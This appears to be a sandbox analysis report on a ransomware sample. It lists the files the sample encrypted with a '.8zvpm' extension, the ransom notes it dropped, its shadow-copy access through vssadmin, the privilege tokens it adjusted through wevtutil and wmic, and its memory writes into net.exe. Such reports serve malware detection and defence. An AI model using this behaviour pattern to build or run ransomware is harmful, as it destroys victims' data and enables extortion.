File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Colombo.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_G0g6UHQUmlE0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Windows Media Player\fr-FR\wmlaunch.exe.mui C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\drag.png C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105912.WMF.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_Mqv05mXNoYc0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0239063.WMF.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_UR-TWSk6Y-00.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18229_.WMF.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_eYCRUQ-fDPo0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\DataType\Priority.accft.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_2NWrEw4NyV00.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\en-US\tipresx.dll.mui C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky\Monticello.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_NPh0CfY_xTc0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Groove.en-us\GrooveMUI.XML.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_cgGmjWmhAuc0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\ink\ja-JP\TipBand.dll.mui C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsPreviewTemplate.html.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_ct_JXsD6yJk0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-first-quarter.png C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\TASKUPD.CFG.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_LZWqNJV9cZI0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\ja-JP\gadget.xml C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\en-US\TipBand.dll.mui C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-swing-tabcontrol.xml.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_w4usS39bhb80.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\es-ES\js\cpu.js C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0185828.WMF.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_rWaJGiWWjcg0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN102.XML.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_h83c3O6PG8M0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes.nl_zh_4.4.0.v20140623020002.jar.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_0a98_q_m5no0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Ust-Nera.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_S-eLkrsXgO40.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099180.WMF.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_0BI2aEwimYE0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR45B.GIF.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD__L46H9-UUHo0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\vyS2_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\vyS2_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Inuvik.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_kUc8uqKF5kk0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00170_.GIF.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_nXt1x6BfYng0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN01184_.WMF.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_holcTDQzaM00.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0313974.JPG.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_6GnVp6OOZFk0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsPreviewTemplate.html.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_r9-icbW0TJc0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\45.png C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.common_5.5.0.165303.jar.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_9R0oDF2h-tQ0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\smtp.jar.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_EvBr5hhVyxA0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00276_.WMF.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD__mir0upb2gE0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\INFOPATH_COL.HXT.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_6fUlYXcAmKg0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ru.txt.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_TktKl8C6PxM0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Monet.jpg C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Yekaterinburg.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_zYF28hI0bAQ0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.contenttype_3.4.200.v20140207-1251.jar.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_VJFJ5A0BKrQ0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107146.WMF.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_IHJMT039lf80.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0182689.JPG.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_RwqhBFuikqU0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TR00095_.WMF.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_uO5JglnBLp40.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\flyout.html C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\kn\LC_MESSAGES\vyS2_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.databinding.nl_zh_4.4.0.v20140623020002.jar.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_r8vLw2wF_7Q0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Apia.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_JL8x9Y7ekRU0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099203.GIF.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_5EQaLs5_ABA0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02748G.GIF.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_rIFHZzQ27XY0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\EXCEL.DEV_F_COL.HXK.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_YT3k6pJFONI0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectToolsetIconImages.jpg.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_2XzOMFaj23g0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-first-quarter.png C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\AddSearch.m3u.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_DYMiD92PqR00.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Common Files\System\msadc\adcjavas.inc C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Noumea.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_4dNEMOMWQh80.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_iRZZndEEMEE0.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02228_.WMF.3cBvgYelgI4STvZqlRiJwGO7O92MMzoFq_D2f892TgD_UBjnf_Rty000.8zvpm C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\es-ES\gadget.xml C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe N/A

Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\notepad.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1540 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1540 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1540 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1720 wrote to memory of 652 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1720 wrote to memory of 652 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1720 wrote to memory of 652 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1540 wrote to memory of 560 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1540 wrote to memory of 560 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1540 wrote to memory of 560 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 560 wrote to memory of 708 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 560 wrote to memory of 708 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 560 wrote to memory of 708 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1540 wrote to memory of 632 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1540 wrote to memory of 632 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1540 wrote to memory of 632 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 632 wrote to memory of 816 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 632 wrote to memory of 816 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 632 wrote to memory of 816 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1540 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1540 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1540 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1984 wrote to memory of 1120 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1984 wrote to memory of 1120 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1984 wrote to memory of 1120 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1540 wrote to memory of 384 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1540 wrote to memory of 384 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1540 wrote to memory of 384 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 384 wrote to memory of 960 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 384 wrote to memory of 960 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 384 wrote to memory of 960 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1540 wrote to memory of 1468 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1540 wrote to memory of 1468 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1540 wrote to memory of 1468 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1468 wrote to memory of 1116 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1468 wrote to memory of 1116 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1468 wrote to memory of 1116 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1540 wrote to memory of 820 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
PID 1540 wrote to memory of 820 N/A C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe C:\Windows\system32\net.exe
